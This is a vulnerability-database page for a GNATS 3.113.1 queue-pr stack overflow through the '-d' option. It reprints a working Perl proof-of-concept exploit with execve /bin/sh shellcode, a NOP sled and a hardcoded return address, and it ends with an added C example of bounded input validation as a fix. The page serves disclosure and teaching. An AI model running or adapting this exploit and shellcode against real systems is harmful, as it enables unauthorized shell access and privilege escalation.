GNU GNATS 3.113.1_6 – Queue-PR Database Command Line Option Buffer Overflow

Vulnerability ID 1054047 Vulnerability type
Published 2003-07-21 Updated 2003-07-21
CVE ID N/A
CNNVD-ID N/A
Platform Unix CVSS score N/A
|Source
https://www.exploit-db.com/exploits/22939
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
source: http://www.securityfocus.com/bid/8232/info

A stack overflow vulnerability has been reported for the queue-pr utility of GNATS. The vulnerability occurs due to insufficient checks performed on the arguments to the '-d' command-line option.

Successful exploitation may result in the execution of attacker-supplied code with potentially elevated privileges.

#!/usr/bin/perl

# Simple PoC exploit for gnats
# Tested on FreeBSD 5.0 with gnats-3.113.1_6
# if all works it gives gnats access

# Code by inv[at]dtors

$ret_hex = 0xbfbffb90;
$shellcode ="\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x54\x53\x52\x31\xc0\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
$nops = "\x90"x1110;
$ret = pack('l', $ret_hex);

$exploit = "$nops"."$shellcode"."$ret"."$ret";
local($ENV{'EXP'}) = $exploit; 

print "\ndtors gnats exploit\n";
print "code by inv\n\n";
print ("Address: 0x", sprintf('%lx', $ret_hex),"\n\n");

system('/usr/local/libexec/gnats/queue-pr -d $EXP -O bbb');
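
The advisory attributes the overflow to insufficient checks on the '-d' argument. The following C code is an added example, not GNATS source and not part of the original advisory: it copies such an argument into a fixed-size buffer only after a bounded length check and a content check. The function name, the buffer size, the printable-ASCII policy and the sample path are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size: the real GNATS buffer size is not given on the page. */
#define DB_DIR_MAX 256

/*
 * Unsafe pattern behind this class of bug (illustrative, not GNATS source):
 *     char dir[DB_DIR_MAX];
 *     strcpy(dir, optarg);    // length of the -d argument never checked
 */

/*
 * Copy a -d style argument into a fixed-size buffer.
 * Returns 0 on success, -1 if the argument is rejected.
 * Oversized input is rejected outright, never truncated.
 */
int set_database_dir(const char *arg, char *out, size_t outlen)
{
    size_t n = 0, i;

    if (arg == NULL || out == NULL || outlen == 0)
        return -1;
    while (n < outlen && arg[n] != '\0')   /* bounded length scan */
        n++;
    if (n == 0 || n == outlen)             /* empty, or no room for the NUL */
        return -1;
    for (i = 0; i < n; i++) {              /* assumed policy: printable ASCII */
        unsigned char c = (unsigned char)arg[i];
        if (c < 0x20 || c > 0x7e)
            return -1;
    }
    memcpy(out, arg, n + 1);               /* n + 1 <= outlen is guaranteed */
    return 0;
}

int main(void)
{
    char dir[DB_DIR_MAX];
    char big[1200];                        /* constructed oversized argument */

    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("normal:    %d\n", set_database_dir("/tmp/example-db", dir, sizeof dir));
    printf("oversized: %d\n", set_database_dir(big, dir, sizeof dir));
    return 0;
}
```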
